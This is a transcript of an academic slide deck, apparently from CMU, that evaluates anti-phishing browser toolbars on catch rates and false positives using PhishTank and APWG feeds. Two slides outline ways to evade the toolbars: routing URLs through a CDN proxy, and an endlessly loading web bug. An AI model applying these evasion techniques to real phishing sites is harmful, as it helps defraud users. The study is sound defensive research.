1 / 29

Phinding Phish: An Evaluation of Anti-Phishing Toolbars

This study evaluates the effectiveness and usability of various anti-phishing toolbars available on the market. It examines their catch rates, false positives, and performance with different phishing feeds. The study also explores the impact of content delivery network (CDN) and page load attacks on these toolbars, suggesting areas for improvement.

marylnj
Download Presentation

Phinding Phish: An Evaluation of Anti-Phishing Toolbars

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Phinding Phish: An Evaluation of Anti-Phishing Toolbars Yue Zhang, Serge Egelman, Lorrie Cranor, and Jason Hong

  2. Anti-Phishing Tools • 84 Listed on download.com (Sept. ‘06) • Included in many browsers • Poor usability • Many users don’t see indicators • Many choose to ignore them • But usability is being addressed • Are they accurate?

  3. Tools Tested • CallingID • Cloudmark • EarthLink

  4. Tools Tested • eBay • Firefox

  5. Tools Tested • IE7

  6. Tools Tested • Netcraft • Netscape

  7. Tools Tested • SpoofGuard • TrustWatch

  8. Source of Phish • High volume of fresh phish • Sites taken down after a day on average • Fresh phish yield blacklist update information • Can’t use toolbar blacklists • We experimented with several sources • APWG - high volume but many duplicates and legitimate URLs included • Phishtank.org - lower volume but easier to extract phish • Assorted other phish archives - often low volume or not fresh enough

  9. Phishing Feeds • Anti-Phishing Working Group • reportphishing@antiphishing.org • ISPs, individuals, etc. • >2,000 messages/day • Filtering out URLs from messages • PhishTank • http://www.phishtank.org/ • Submitted by public • ~48 messages/day • Manually verify URLs

  10. Testbed for Anti-Phishing Toolbars • Automated testing • Aggregate performance statistics • Key design issue: • Different browsers • Different toolbars • Different indicator types • Solution: Image analysis • Compare screenshots with known states

  11. Two examples: TrustWatch and Google TrustWatch: Google: Not verified Warning!! Verified Phish!! Image-Based Comparisons ScreenShot ScreenShot

  12. Testbed System Architecture

  13. Testbed System Architecture Retrieve Potential Phishing Sites

  14. Testbed System Architecture Send URL to Workers

  15. Testbed System Architecture Worker Evaluates Potential Phishing Site

  16. Testbed System Architecture Task Manager Aggregates Results

  17. Experiment Methodology • Catch Rate: Given a set of phishing URLs, what percentage of them are correctly labeled as phish by the tool - count block and warning only - taken down sites removed • False Positives: Given a set of legitimate URLs, what percentage of them are incorrectly labeled as phish by the tool - count block and warning only - taken down sites removed

  18. Experiment 1 • PhishTank feed used • Equipment: • 1 Notebook as Task Manager • 2 Notebooks as Workers • 10 Tools Examined: • CloudMark • Earthlink • eBay • IE7 • Google/Firefox • McAfee • Netcraft • Netscape • SpoofGuard • TrustWatch

  19. Experiment 1 • 100 phishing URLs • PhishTank feed • Manually verified • Re-examined at 1, 2, 12, 24 hour intervals • Examined blacklist update rate (except w/SpoofGuard) • Examined take-down rate • 514 legitimate URLs • 416 from 3Sharp report • 35 from bank log-in pages • 35 from top pages by Alexa • 30 random pages

  20. Experiment 2 • APWG phishing feed • 9 of the same toolbars tested + CallingID • Same testing environment

  21. Results of Experiment 1

  22. Results of Experiment 2

  23. False Positives Not a big problem for most of the toolbars

  24. Overall findings • No toolbar caught 100% • Good performers: • SpoofGuard (>90%) • Though 42% false positives • IE7 (70%-80%) • Netcraft (60%-80%) • Firefox (50%-80%) • Most performed poorly: • Netscape (10%-30%) • CallingID (20%-40%)

  25. More findings • Performance varied with feed • Better with Phishtank: • Cloudmark, Earthlink, Firefox, Netcraft • Better with APWG: • eBay, IE7, Netscape • Almost the same: • Spoofguard, Trustwatch • Different increases over time • More increases on APWG • Reflects the “freshness” of URLs

  26. CDN Attack • Many tools use blacklists • Many examine IP addresses (location, etc.) • Proxies distort URLs • Used Coral CDN • Append .nyud.net:8090 to URLs • Uses PlanetLab • Works on: • Cloudmark • Google • TrustWatch • Netcraft • Netscape

  27. Page Load Attack • Some wait for page to be fully loaded • SpoofGuard • eBay • Insert a web bug taking infinite load time • 5 lines of PHP • 1x1 GIF • Infinite loop spitting out data very slowly • Tool stays in previous state • Unable to indicate anything

  28. Conclusion • Tool Performance • No toolbars are perfect • No single toolbar will outperform others • Heuristics have false positives • Whitelists? • Hybrid approach? • Testing Methodology • Get fresher URLs • Test other than default settings • User interfaces • Usability is important • Traffic light? • Pop up message? • Re-direct page?

  29. CMUUsablePrivacy andSecurity Laboratory http://cups.cs.cmu.edu/

More Related